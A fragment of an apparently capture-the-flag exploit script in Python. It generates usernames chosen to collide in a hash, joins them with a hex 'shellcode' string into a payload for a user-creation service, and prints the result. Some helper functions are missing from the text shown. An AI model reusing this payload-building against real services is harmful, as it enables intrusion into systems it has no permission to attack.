letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(n))
def create_random_users():
print(";".join(["new " + generate_random_string(4) + " 1337" for _ in 'abcdefghijklmn']))
def create_deterministic_users():
print(";".join(["new " + 4 * c + " 1337" for c in 'abcdefghijklmn']))
def generate_shell_code() -> str:
# new
# \
# ------ ----
# ------------
return "6e6577203c5044407cf920313333373b"
if __name__ == "__main__":
s = transform_ascii_to_bytes(find_users_that_hash(5, 3))
s += generate_shell_code()
s += transform_ascii_to_bytes(find_users_that_hash(7, 3))
print(s)
# create_deterministic_users()